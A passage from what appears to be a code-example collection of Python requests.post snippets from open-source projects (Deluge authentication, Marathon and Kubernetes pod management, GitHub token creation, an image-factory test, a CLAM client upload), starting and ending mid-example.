                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")

            else:
                mt.addUIMessage("No IP addresses found with this ssl cert subject cn: {cn}".format(cn=cn))
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No data was found for this subject cn {cn}".format(cn=cn))
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()

    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()

Example 26

Project: sd-agent Source File: test_transaction.py
    def testEndpoints(self):
        """
        Tests that the logic behind the agent version specific endpoints is ok.
        Also tests that these endpoints actually exist.
        """
        raise SkipTest("This test doesn't apply to Server Density.")
        MetricTransaction._endpoints = []
        api_key = "a" * 32
        config = {
            "sd_url": "https://agent.serverdensity.io",
            "api_key": api_key,
            "use_dd": True
        }

        app = Application()
        app.skip_ssl_validation = False
        app._agentConfig = config
        app.use_simple_http_client = True

        trManager = TransactionManager(timedelta(seconds=0), MAX_QUEUE_SIZE, THROTTLING_DELAY)
        trManager._flush_without_ioloop = True  # Use blocking API to emulate tornado ioloop
        MetricTransaction._trManager = trManager
        MetricTransaction.set_application(app)
        MetricTransaction.set_endpoints()

        transaction = MetricTransaction(None, {}, "")
        endpoints = [transaction.get_url(e) for e in transaction._endpoints]
        expected = ['https://{0}-app.agent.datadoghq.com/intake/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Metric Transaction
        transaction = APIMetricTransaction(None, {})
        endpoints = [transaction.get_url(e) for e in transaction._endpoints]
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/series/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({"foo": "bar"}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

        # API Service Check Transaction
        APIServiceCheckTransaction._trManager = trManager
        APIServiceCheckTransaction.set_application(app)
        APIServiceCheckTransaction.set_endpoints()

        transaction = APIServiceCheckTransaction(None, {})
        endpoints = [transaction.get_url(e) for e in transaction._endpoints]
        expected = ['https://{0}-app.agent.datadoghq.com/api/v1/check_run/?api_key={1}'.format(
            get_version().replace(".", "-"), api_key)]
        self.assertEqual(endpoints, expected, (endpoints, expected))

        for url in endpoints:
            r = requests.post(url, data=json.dumps({'check': 'test', 'status': 0}),
                              headers={'Content-Type': "application/json"})
            r.raise_for_status()

Example 27

Project: edx-platform Source File: release.py
Function: create_github_creds
def create_github_creds():
    """
    https://developer.github.com/v3/oauth_authorizations/#create-a-new-authorization
    """
    headers = {"User-Agent": "edx-release"}
    payload = {
        "note": "edx-release",
        "scopes": ["repo"],
    }
    username = raw_input("GitHub username: ")
    password = getpass.getpass("GitHub password: ")
    response = requests.post(
        "https://api.github.com/authorizations",
        auth=(username, password),
        headers=headers, data=json.dumps(payload),
    )
    # is the user using two-factor authentication?
    otp_header = response.headers.get("X-GitHub-OTP")
    if not response.ok and otp_header and otp_header.startswith("required;"):
        # get two-factor code, redo the request
        headers["X-GitHub-OTP"] = raw_input("Two-factor authentication code: ")
        response = requests.post(
            "https://api.github.com/authorizations",
            auth=(username, password),
            headers=headers, data=json.dumps(payload),
        )
    if not response.ok:
        message = response.json()["message"]
        if message != "Validation Failed":
            raise requests.exceptions.RequestException(message)
        else:
            # A token called "edx-release" already exists on GitHub.
            # Delete it, and try again.
            token_id = get_github_auth_id(username, password, "edx-release")
            if token_id:
                delete_github_auth_token(username, password, token_id)
            response = requests.post(
                "https://api.github.com/authorizations",
                auth=(username, password),
                headers=headers, data=json.dumps(payload),
            )
    if not response.ok:
        message = response.json()["message"]
        raise requests.exceptions.RequestException(message)

    return (username, response.json()["token"])

Example 28

Project: headphones Source File: deluge.py
def _get_auth():
    logger.debug('Deluge: Authenticating...')
    global delugeweb_auth, delugeweb_url, deluge_verify_cert
    delugeweb_auth = {}

    delugeweb_host = headphones.CONFIG.DELUGE_HOST
    delugeweb_cert = headphones.CONFIG.DELUGE_CERT
    delugeweb_password = headphones.CONFIG.DELUGE_PASSWORD
    logger.debug('Deluge: Using password %scuem**%s' % (delugeweb_password[0], delugeweb_password[-1]))

    if not delugeweb_host.startswith('http'):
        delugeweb_host = 'http://%s' % delugeweb_host

    if delugeweb_cert is None or delugeweb_cert.strip() == '':
        deluge_verify_cert = False
        logger.debug('Deluge: FYI no SSL certificate configured')
    else:
        deluge_verify_cert = delugeweb_cert
        delugeweb_host = delugeweb_host.replace('http:', 'https:')
        logger.debug('Deluge: Using certificate %s, host is now %s' % (_scrubber(deluge_verify_cert), _scrubber(delugeweb_host)))

    if delugeweb_host.endswith('/'):
        delugeweb_host = delugeweb_host[:-1]

    delugeweb_url = delugeweb_host + '/json'

    post_data = json.dumps({"method": "auth.login",
                            "params": [delugeweb_password],
                            "id": 1})
    try:
        response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
            verify=deluge_verify_cert)
    except requests.ConnectionError:
        try:
            logger.debug('Deluge: Connection failed, let\'s try HTTPS just in case')
            response = requests.post(delugeweb_url.replace('http:', 'https:'), data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
            # If the previous line didn't fail, change delugeweb_url for the rest of this session
            logger.error('Deluge: Switching to HTTPS, but certificate won\'t be verified because NO CERTIFICATE WAS CONFIGURED!')
            delugeweb_url = delugeweb_url.replace('http:', 'https:')
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None
    except Exception as e:
        logger.error('Deluge: Authentication failed: %s' % str(e))
        formatted_lines = traceback.format_exc().splitlines()
        logger.error('; '.join(formatted_lines))
        return None

    auth = json.loads(response.text)["result"]
    auth_error = json.loads(response.text)["error"]
    logger.debug('Deluge: Authentication result: %s, Error: %s' % (auth, auth_error))
    delugeweb_auth = response.cookies
    logger.debug('Deluge: Authentication cookies: %s' % _scrubber(str(delugeweb_auth.get_dict())))
    post_data = json.dumps({"method": "web.connected",
                            "params": [],
                            "id": 10})
    try:
        response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
            verify=deluge_verify_cert)
    except Exception as e:
        logger.error('Deluge: Authentication failed: %s' % str(e))
        formatted_lines = traceback.format_exc().splitlines()
        logger.error('; '.join(formatted_lines))
        return None

    connected = json.loads(response.text)['result']
    connected_error = json.loads(response.text)['error']
    logger.debug('Deluge: Connection result: %s, Error: %s' % (connected, connected_error))

    if not connected:
        post_data = json.dumps({"method": "web.get_hosts",
                                "params": [],
                                "id": 11})
        try:
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None

        delugeweb_hosts = json.loads(response.text)['result']
        if len(delugeweb_hosts) == 0:
            logger.error('Deluge: WebUI does not contain daemons')
            return None

        post_data = json.dumps({"method": "web.connect",
                                "params": [delugeweb_hosts[0][0]],
                                "id": 11})

        try:
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None

        post_data = json.dumps({"method": "web.connected",
                                "params": [],
                                "id": 10})

        try:
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
        except Exception as e:
            logger.error('Deluge: Authentication failed: %s' % str(e))
            formatted_lines = traceback.format_exc().splitlines()
            logger.error('; '.join(formatted_lines))
            return None

        connected = json.loads(response.text)['result']

        if not connected:
            logger.error('Deluge: WebUI could not connect to daemon')
            return None

    return auth

Example 29

Project: headphones Source File: deluge.py
def setTorrentLabel(result):
    logger.debug('Deluge: Setting label')
    label = headphones.CONFIG.DELUGE_LABEL

    if not any(delugeweb_auth):
        _get_auth()

    if ' ' in label:
        logger.error('Deluge: Invalid label. Label can\'t contain spaces - replacing with underscores')
        label = label.replace(' ', '_')
    if label:
        # check if label already exists and create it if not
        post_data = json.dumps({"method": 'label.get_labels',
                                "params": [],
                                "id": 3})
        response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
            verify=deluge_verify_cert)
        labels = json.loads(response.text)['result']

        if labels is not None:
            if label not in labels:
                try:
                    logger.debug('Deluge: %s label doesn\'t exist in Deluge, let\'s add it' % label)
                    post_data = json.dumps({"method": 'label.add',
                                            "params": [label],
                                            "id": 4})
                    response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                        verify=deluge_verify_cert)
                    logger.debug('Deluge: %s label added to Deluge' % label)
                except Exception as e:
                    logger.error('Deluge: Setting label failed: %s' % str(e))
                    formatted_lines = traceback.format_exc().splitlines()
                    logger.error('; '.join(formatted_lines))

            # add label to torrent
            post_data = json.dumps({"method": 'label.set_torrent',
                                    "params": [result['hash'], label],
                                    "id": 5})
            response = requests.post(delugeweb_url, data=post_data.encode('utf-8'), cookies=delugeweb_auth,
                verify=deluge_verify_cert)
            logger.debug('Deluge: %s label added to torrent' % label)
        else:
            logger.debug('Deluge: Label plugin not detected')
            return False

    return not json.loads(response.text)['error']

Example 30

Project: ochothon Source File: kill.py
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - kill all (or part of) the pods using a POST /control/kill
            # - wait for them to be dead
            # - warning, /control/kill will block (hence the 5 seconds timeout)
            #
            @retry(timeout=self.timeout, pause=0)
            def _spin():
                def _query(zk):
                    replies = fire(zk, self.cluster, 'control/kill', subset=self.indices, timeout=self.timeout)
                    return [(code, seq) for seq, _, code in replies.values()]

                #
                # - fire the request one or more pods
                # - wait for every pod to report back a HTTP 410 (GONE)
                # - this means the ochopod state-machine is now idling (e.g dead)
                #
                js = run(self.proxy, _query)
                gone = sum(1 for code, _ in js if code == 410)
                assert gone == len(js), 'at least one pod is still running'
                return [seq for _, seq in js]

            down = _spin()
            self.out['down'] = down
            assert down, 'the cluster is either invalid or empty'
            logger.debug('%s : %d dead pods -> %s' % (self.cluster, len(down), ', '.join(['#%d' % seq for seq in down])))

            #
            # - now peek and see what pods we have
            # - we want to know what the underlying marathon application & task are
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info', subset=self.indices)
                return [(hints['application'], hints['task']) for _, hints, _ in replies.values()]

            js = run(self.proxy, _query)
            rollup = {key: [] for key in set([key for key, _ in js])}
            for app, task in js:
                rollup[app] += [task]

            #
            # - go through each application
            # - query the it and check how many tasks it currently has
            # - the goal is to check if we should nuke the whole application or not
            #
            for app, tasks in rollup.items():

                url = 'http://%s/v2/apps/%s/tasks' % (master, app)
                reply = get(url, headers=headers)
                code = reply.status_code
                logger.debug('%s : -> %s (HTTP %d)' % (self.cluster, url, code))
                assert code == 200, 'task lookup failed (HTTP %d)' % code
                js = reply.json()

                if len(tasks) == len(js['tasks']):

                    #
                    # - all the containers running for that application were reported as dead
                    # - issue a DELETE /v2/apps to nuke the whole thing
                    #
                    url = 'http://%s/v2/apps/%s' % (master, app)
                    reply = delete(url, headers=headers)
                    code = reply.status_code
                    logger.debug('%s : -> %s (HTTP %d)' % (self.cluster, url, code))
                    assert code == 200 or code == 204, 'application deletion failed (HTTP %d)' % code

                else:

                    #
                    # - we killed a subset of that application's pods
                    # - cherry pick the underlying tasks and delete them at once using POST v2/tasks/delete
                    #
                    js = \
                        {
                            'ids': tasks
                        }

                    url = 'http://%s/v2/tasks/delete?scale=true' % master
                    reply = post(url, data=json.dumps(js), headers=headers)
                    code = reply.status_code
                    logger.debug('-> %s (HTTP %d)' % (url, code))
                    assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code

            self.out['ok'] = True

        except AssertionError as failure:

            logger.debug('%s : failed to kill -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to kill -> %s' % (self.cluster, diagnostic(failure)))

Example 31

Project: imagefactory Source File: e2eTest.py
def build_push_delete(target, index):
    global test_index
    build_queue.acquire()
    try:
        if(index < len(base_images)):
            base_image = base_images[index]
            if args.remote:
                payload = {'target_image': {'target': target}}
                print "Creating a target image"
                r = requests.post(args.url+'/base_images/'+base_image['id']+'/target_images', data=json.dumps(payload), headers=requests_headers, auth=oauth, verify=False)
                target_image_output_str = r.text
            else:
                (target_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw target_image --id %s %s' % (args.cmd, base_image['id'], target), shell=True)
            target_image_output_dict = json.loads(target_image_output_str)['target_image']
            target_image_id = target_image_output_dict['id']
            while(target_image_output_dict['status'] not in ('COMPLETE', 'COMPLETED', 'FAILED')):
                sleep(proc_chk_interval)
                if args.remote:
                    r = requests.get(args.url+'/target_images/'+target_image_id, auth=oauth, verify=False)
                    target_image_output_str = r.text
                else:
                    (target_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw images \'{"identifier":"%s"}\'' % (args.cmd, target_image_id), shell=True)
                target_image_output_dict = json.loads(target_image_output_str)['target_image']

            if(target_image_output_dict['status'] == 'FAILED'):
                with f_lock:
                    failures.append(target_image_output_dict)
            else:
                with t_lock:
                    target_images.append(target_image_output_dict)
                for provider in providers:
                    if((not provider['name'].startswith('example')) and (provider['target'] == target)):
                        try:
                            if 'ec2' in provider['target']:
                                f = open(provider['credentials'], 'r')
                                provider['credentials'] = f.read()
                                f.close()
                            credentials_file = NamedTemporaryFile()
                            credentials_file.write(provider['credentials'])
                            provider_file = NamedTemporaryFile()
                            provider_file.write(str(provider['definition']))
                            if args.remote:
                                payload = {'provider_image': {'target': target, 'provider': provider['name'], 'credentials': provider['credentials']}}
                                r = requests.post(args.url+'/target_images/'+target_image_id+'/provider_images', data=json.dumps(payload), headers=requests_headers, auth=oauth, verify=False)
                                provider_image_output_str = r.text
                            else:
                                (provider_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw provider_image --id %s %s %s %s' % (args.cmd, target_image_id, provider['target'], provider_file.name, credentials_file.name), shell=True)
                            provider_image_output_dict = json.loads(provider_image_output_str)['provider_image']
                            provider_image_id = provider_image_output_dict['id']
                            while(provider_image_output_dict['status'] not in ('COMPLETE', 'COMPLETED', 'FAILED')):
                                sleep(proc_chk_interval)
                                if args.remote:
                                    r = requests.get(args.url+'/provider_images/'+provider_image_id, auth=oauth, verify=False)
                                    provider_image_output_str = r.text
                                else:
                                    (provider_image_output_str, ignore, ignore) = subprocess_check_output('%s --output json --raw images \'{"identifier":"%s"}\'' % (args.cmd, provider_image_id), shell=True)
                                provider_image_output_dict = json.loads(provider_image_output_str)['provider_image']

                            if(provider_image_output_dict['status'] == 'FAILED'):
                                with f_lock:
                                    failures.append(provider_image_output_dict)
                            else:
                                with p_lock:
                                    provider_images.append(provider_image_output_dict)
                                if args.remote:
                                    
                                    print "Checking status of %s" % (base_image_id,)
                                    r = requests.delete(args.url+'/provider_images/'+provider_image_id, auth=oauth, verify=False)
                                else:
                                    subprocess_check_output('%s --output json --raw delete %s --target %s --provider %s --credentials %s' % (args.cmd, provider_image_id, provider['target'], provider_file.name, credentials_file.name), shell=True)
                        finally:
                            credentials_file.close()
                            provider_file.close()

    finally:
        build_queue.release()
        test_index += 1

Example 32

Project: ochonetes Source File: deploy.py
    def run(self):
        try:

            #
            # - workaround to fetch the master IP and credentials as there does not seem to
            #   be a way to use 10.0.0.2 from within the pod
            #
            assert 'KUBERNETES_MASTER' in os.environ,   '$KUBERNETES_MASTER not specified (check your portal pod)'
            assert 'KUBERNETES_USER' in os.environ,     '$KUBERNETES_USER not specified (check your portal pod)'
            assert 'KUBERNETES_PWD' in os.environ,      '$KUBERNETES_PWD not specified (check your portal pod)'

            auth = HTTPBasicAuth(os.environ['KUBERNETES_USER'], os.environ['KUBERNETES_PWD'])

            with open(self.template, 'r') as f:

                #
                # - parse the yaml file
                # - add the ochopod control port if not specified
                #
                cfg = yaml.load(f)
                if 8080 not in cfg['ports']:
                    cfg['ports'].append(8080)

                #
                # -
                #
                suffix = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')
                qualified = 'ochopod.%s.%s-%s' % (self.namespace, cfg['cluster'], suffix)

                env = \
                    {
                        'KUBERNETES_MASTER': os.environ['KUBERNETES_MASTER'],
                        'KUBERNETES_USER': os.environ['KUBERNETES_USER'],
                        'KUBERNETES_PWD': os.environ['KUBERNETES_PWD'],
                        'ochopod_cluster': cfg['cluster'],
                        'ochopod_namespace': self.namespace,
                        'ochopod_application': qualified,
                        'pod': json.dumps(cfg['settings']) if 'settings' in cfg else '{}'
                    }

                labels = \
                    {
                        'name': qualified
                    }

                container = \
                    {
                        'name': cfg['cluster'],
                        'image': cfg['image'],
                        'env': [{'name': key, 'value': value} for key, value in env.items()],
                        'ports': [{'containerPort': port} for port in cfg['ports']]
                    }

                controller = \
                    {
                        'kind': 'ReplicationController',
                        'apiVersion': 'v1beta3',
                        'metadata': {'name': qualified},
                        'spec':
                            {
                                'replicas': self.pods,
                                'selector': {'name': qualified},
                                'template':
                                    {
                                        'metadata': {'labels': labels},
                                        'spec':
                                            {
                                                'containers': [container]
                                            }
                                    }
                            }

                    }

                #
                # -
                #
                headers = \
                    {
                        'content-type': 'application/json',
                        'accept': 'application/json'
                    }

                url = 'https://%s/api/v1beta3/namespaces/default/replicationcontrollers' % os.environ['KUBERNETES_MASTER']
                reply = requests.post(url, auth=auth, data=json.dumps(controller), headers=headers, verify=False)
                code = reply.status_code
                logger.debug('-> POST %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'submission failed (HTTP %d)' % code

            self.deployed = self.pods
            self.ok = 1

        except AssertionError as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, failure))

        except YAMLError as failure:

            if hasattr(failure, 'problem_mark'):
                mark = failure.problem_mark
                logger.debug('%s : invalid deploy.yml (line %s, column %s)' % (self.template, mark.line+1, mark.column+1))

        except Exception as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, diagnostic(failure)))

Example 33

Project: ochothon Source File: scale.py
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            #
            # - first peek and see what pods we have
            #
            def _query(zk):
                replies = fire(zk, self.cluster, 'info')
                return [(seq, hints['application'], hints['task']) for (seq, hints, _) in replies.values()]

            #
            # - remap a bit differently and get an ordered list of task identifiers
            # - we'll use that to kill the newest pods
            #
            js = run(self.proxy, _query)
            total = len(js)
            if self.group is not None:

                #
                # - if -g was specify apply the scaling to the underlying marathon application containing that pod
                # - be careful to update the task list and total # of pods
                #
                keys = {seq: key for (seq, key, _) in js}
                assert self.group in keys, '#%d is not a valid pod index' % self.group
                app = keys[self.group]
                tasks = [(seq, task) for (seq, key, task) in sorted(js, key=(lambda _: _[0])) if key == app]
                total = sum(1 for (_, key, _) in js if key == app)

            else:

                #
                # - check and make sure all our pods map to one single marathon application
                #
                keys = set([key for (_, key, _) in js])
                assert len(keys) == 1, '%s maps to more than one application, you must specify -g' % self.cluster
                tasks = [(seq, task) for (seq, _, task) in sorted(js, key=(lambda _: _[0]))]
                app = keys.pop()

            #
            # - infer the target # of pods based on the user-defined factor
            #
            operator = self.factor[0]
            assert operator in ['@', 'x'], 'invalid operator'
            n = float(self.factor[1:])
            target = n if operator == '@' else total * n

            #
            # - clip the target # of pods down to 1
            #
            target = max(1, int(target))
            self.out['delta'] = target - total
            if target > total:

                #
                # - scale the application capacity up
                #
                js = \
                    {
                        'instances': target
                    }

                url = 'http://%s/v2/apps/%s' % (master, app)
                reply = put(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'update failed (HTTP %d)' % code

                #
                # - wait for all our new pods to be there
                #
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, self.cluster, 'info')
                        return [seq for seq, _, _ in replies.values()]

                    js = run(self.proxy, _query)
                    assert len(js) == target, 'not all pods running yet'
                    return js

                _spin()

            elif target < total:

                #
                # - if the fifo switch is on make sure to pick the oldest pods for deletion
                #
                tasks = tasks[:total - target] if self.fifo else tasks[target:]

                #
                # - kill all (or part of) the pods using a POST /control/kill
                # - wait for them to be dead
                #
                @retry(timeout=self.timeout, pause=0)
                def _spin():
                    def _query(zk):
                        indices = [seq for (seq, _) in tasks]
                        replies = fire(zk, self.cluster, 'control/kill', subset=indices, timeout=self.timeout)
                        return [(code, seq) for seq, _, code in replies.values()]

                    #
                    # - fire the request one or more pods
                    # - wait for every pod to report back a HTTP 410 (GONE)
                    # - this means the ochopod state-machine is now idling (e.g dead)
                    #
                    js = run(self.proxy, _query)
                    gone = sum(1 for code, _ in js if code == 410)
                    assert gone == len(js), 'at least one pod is still running'
                    return

                _spin()

                #
                # - delete all the underlying tasks at once using POST v2/tasks/delete
                #
                js = \
                    {
                        'ids': [task for (_, task) in tasks]
                    }

                url = 'http://%s/v2/tasks/delete?scale=true' % master
                reply = post(url, data=json.dumps(js), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'delete failed (HTTP %d)' % code

            self.out['ok'] = True

        except AssertionError as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, failure))

        except Exception as failure:

            logger.debug('%s : failed to scale -> %s' % (self.cluster, diagnostic(failure)))

Example 34

Project: rocket-league-replays Source File: unofficial_api.py
def get_league_data(steam_ids):
    """
    Season 1:
    Playlist=0&Mu=20.6591&Sigma=4.11915&RankPoints=100
    Playlist=10&Mu=27.0242&Sigma=2.96727&RankPoints=292
    Playlist=11&Mu=37.0857&Sigma=2.5&RankPoints=618
    Playlist=12&Mu=35.8244&Sigma=2.5&RankPoints=500
    Playlist=13&Mu=33.5018&Sigma=2.5&RankPoints=468
    """

    """
    Season 2:
    Playlist=0&Mu=20.6134&Sigma=3.2206&Tier=
    Playlist=10&Mu=24.9755&Sigma=2.5&Tier=
    Playlist=11&Mu=29.3782&Sigma=2.5&Tier=
    Playlist=12&Mu=34.4383&Sigma=2.5&Tier=
    Playlist=13&Mu=34.5306&Sigma=2.5&Tier=
    """

    """
    Season 2, Patch 1.13:
    Playlist=0&Mu=25.6939&Sigma=2.5&Tier=&Division=&MatchesPlayed=&MMR=
    Playlist=10&Mu=31.8213&Sigma=4.88486&Tier=5&Division=0&MatchesPlayed=11&MMR=17.1667
    Playlist=11&Mu=25.0579&Sigma=2.5&Tier=5&Division=0&MatchesPlayed=31&MMR=17.5579
    Playlist=12&Mu=29.5139&Sigma=3.75288&Tier=0&Division=0&MatchesPlayed=7&MMR=18.2552
    Playlist=13&Mu=27.0215&Sigma=2.5&Tier=5&Division=0&MatchesPlayed=27&MMR=19.5215
    """

    all_steam_ids = list(steam_ids)

    for steam_ids in chunks(all_steam_ids, 10):
        data = {
            'Proc[]': [
                'GetPlayerSkillSteam'
            ] * len(steam_ids),
        }

        for index, steam_id in enumerate(steam_ids):
            data['P{}P[]'.format(index)] = [str(steam_id)]

        headers = api_login()
        r = requests.post(
            API_BASE + '/callproc{}/'.format(API_VERSION),
            headers=headers,
            data=data
        )

        if r.text.strip() == 'SCRIPT ERROR SessionNotActive:':
            print('Hit SessionNotActive')
            cache.delete(CACHE_KEY)
            continue

        # Split the response into individual chunks.
        response_chunks = r.text.strip().split('\r\n\r\n')

        for index, response in enumerate(response_chunks):
            print('Getting rating data for', steam_ids[index])
            matches = re.findall(r'Playlist=(\d{1,2})&Mu=([0-9\.]+)&Sigma=([0-9\.]+)&Tier=(\d*)&Division=(\d?)&MatchesPlayed=(\d*)&MMR=([0-9\.]*)', response)

            if not matches:
                print('no matches')
                continue

            has_tiers = False
            matches_dict = {}

            for match in matches:
                playlist, mu, sigma, tier, division, matches_played, mmr = match

                if tier != '' and tier != '0':
                    has_tiers = True

                    matches_dict[playlist] = {
                        'mu': mu,
                        'sigma': sigma,
                        'tier': tier,
                        'division': division,
                        'matches_played': matches_played,
                        'mmr': mmr,
                    }

            if not has_tiers:
                print('No tiers')
                continue

            object_data = {}

            if str(settings.PLAYLISTS['RankedDuels']) in matches_dict:
                object_data['duels'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['tier']
                object_data['duels_division'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['division']
                object_data['duels_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['mmr'] != '':
                    object_data['duels_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedDuels'])]['mmr']
            else:
                object_data['duels'] = 0

            if str(settings.PLAYLISTS['RankedDoubles']) in matches_dict:
                object_data['doubles'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['tier']
                object_data['doubles_division'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['division']
                object_data['doubles_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['mmr'] != '':
                    object_data['doubles_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedDoubles'])]['mmr']
            else:
                object_data['doubles'] = 0

            if str(settings.PLAYLISTS['RankedSoloStandard']) in matches_dict:
                object_data['solo_standard'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['tier']
                object_data['solo_standard_division'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['division']
                object_data['solo_standard_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['mmr'] != '':
                    object_data['solo_standard_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedSoloStandard'])]['mmr']
            else:
                object_data['solo_standard'] = 0

            if str(settings.PLAYLISTS['RankedStandard']) in matches_dict:
                object_data['standard'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['tier']
                object_data['standard_division'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['division']
                object_data['standard_matches_played'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['matches_played']

                if matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['mmr'] != '':
                    object_data['standard_mmr'] = matches_dict[str(settings.PLAYLISTS['RankedStandard'])]['mmr']
            else:
                object_data['standard'] = 0

            print(object_data)

            # Store this rating.
            LeagueRating.objects.create(
                steamid=steam_ids[index],
                **object_data
            )

Example 35

Project: clam Source File: client.py
    def addinputfile(self, project, inputtemplate, sourcefile, **kwargs):
        """Add/upload an input file to the CLAM service. Supports proper file upload streaming.

        project - the ID of the project you want to add the file to.
        inputtemplate - The input template you want to use to add this file (InputTemplate instance)
        sourcefile - The file you want to add: string containing a filename (or instance of ``file``)

        Keyword arguments (optional but recommended!):
            * ``filename`` - the filename on the server (will be same as sourcefile if not specified)
            * ``metadata`` - A metadata object.
            * ``metafile`` - A metadata file (filename)

        Any other keyword arguments will be passed as metadata and matched with the input template's parameters.

        Example::

            client.addinputfile("myproject", "someinputtemplate", "/path/to/local/file")

        With metadata, assuming such metadata parameters are defined::

            client.addinputfile("myproject", "someinputtemplate", "/path/to/local/file", parameter1="blah", parameterX=3.5)

        """
        if isinstance( inputtemplate, str) or (sys.version < '3' and isinstance( inputtemplate, unicode)): #pylint: disable=undefined-variable
            data = self.get(project) #causes an extra query to server
            inputtemplate = data.inputtemplate(inputtemplate)
        elif not isinstance(inputtemplate, clam.common.data.InputTemplate):
            raise Exception("inputtemplate must be instance of InputTemplate. Get from CLAMData.inputtemplate(id)")

        if not isinstance(sourcefile, IOBase):
            sourcefile = open(sourcefile,'rb')
            if 'filename' in kwargs:
                filename = self.getinputfilename(inputtemplate, kwargs['filename'])
            else:
                filename = self.getinputfilename(inputtemplate, os.path.basename(sourcefile.name) )

        data = {"file": (filename,sourcefile,inputtemplate.formatclass.mimetype), 'inputtemplate': inputtemplate.id}
        for key, value in kwargs.items():
            if key == 'filename':
                pass #nothing to do
            elif key == 'metadata':
                assert isinstance(value, clam.common.data.CLAMMetaData)
                data['metadata'] =  value.xml()
            elif key == 'metafile':
                data['metafile'] = open(value,'rb')
            else:
                data[key] = value


        requestparams = self.initrequest(data)
        if 'auth'in requestparams:
            #TODO: streaming support doesn't work with authentication unfortunately, disabling streaming for now:
            del data['file']
            requestparams['data'] = data
            requestparams['files'] = [('file', (filename,sourcefile, inputtemplate.formatclass.mimetype))]
            if 'metafile' in kwargs:
                del data['metafile']
                requestparams['files'].append(('metafile',('.'+ filename + '.METADATA', open(kwargs['metafile'],'rb'), 'text/xml')))
        else:
            #streaming support
